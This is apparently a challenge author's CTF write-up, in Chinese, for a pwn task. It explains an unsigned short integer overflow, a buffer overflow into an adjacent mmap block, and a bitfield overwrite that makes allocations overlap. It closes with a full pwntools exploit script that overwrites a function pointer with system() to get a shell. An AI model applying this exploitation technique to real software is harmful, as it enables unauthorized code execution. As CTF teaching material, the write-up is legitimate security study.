# 完美冻结

漏洞很简单。

程序用mmap生成了两块0x1000内存快，实现了一套奇怪的存储装置：一个用来做buff，一个用来存数据。

做buff的堆块在重新设置大小(`bmap_set`)时，使用的是`unsigned short`，但是做加法时(或者从`unsigned int`转换到`unsigned short`时)会产生整数溢出。

利用`// `符号读入大量的字符，再配合`\0`符号就可以将buff溢出到后面的堆块。

第二个装置里面用的是位字段指示某个地址是否空闲。将该字段覆盖掉，即可造成两个数据结构被分配在一个地址上。

由于出题人的程序结构又写崩了，于是无奈之下直接给了`system()`函数的地址...也就是说完全不需要绕过任何保护。

利用覆盖将函数指针覆盖为system的即可getshell。

看似复杂其实随便堆点时间就可以拿到flag...就像9的符卡一样嘛(笑)。

代码会随其他源码一同给出。

出题人的验证exp(不知道为什么很莫名其妙但是的确getshell了):

```
#!/usr/bin/env python2

from pwn import *

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']

#p = process('./easy')
#p = gdb.debug('./easy')

puts_plt = 0x00400810
system = 0x400870

payload = ""

payload += "VALUE 1 65\n"

#payload += "VALUE 2 66\n"
pay = "VALUE 2 "
pay += str(system)
pay += '\n'
payload += pay

payload += "VALUE 3 67\n"
payload += "MOV 1 2\n"

pay = "// "
pay += "A" * (32 - len(pay) - 1)
pay += '\n'
payload += pay

pay = "// "
pay += "B" * (32 - len(pay))
pay += "\x07\x00"
pay += "B" * (0xFFFF - len(pay) - 1)
pay += '\n'
payload += pay

pay = "VALUE 4 29400045130965551"
pay += '\n'
payload += pay

payload += "PRINT 4\n"
payload += "END\n"

p.send(payload)

p.interactive()
```

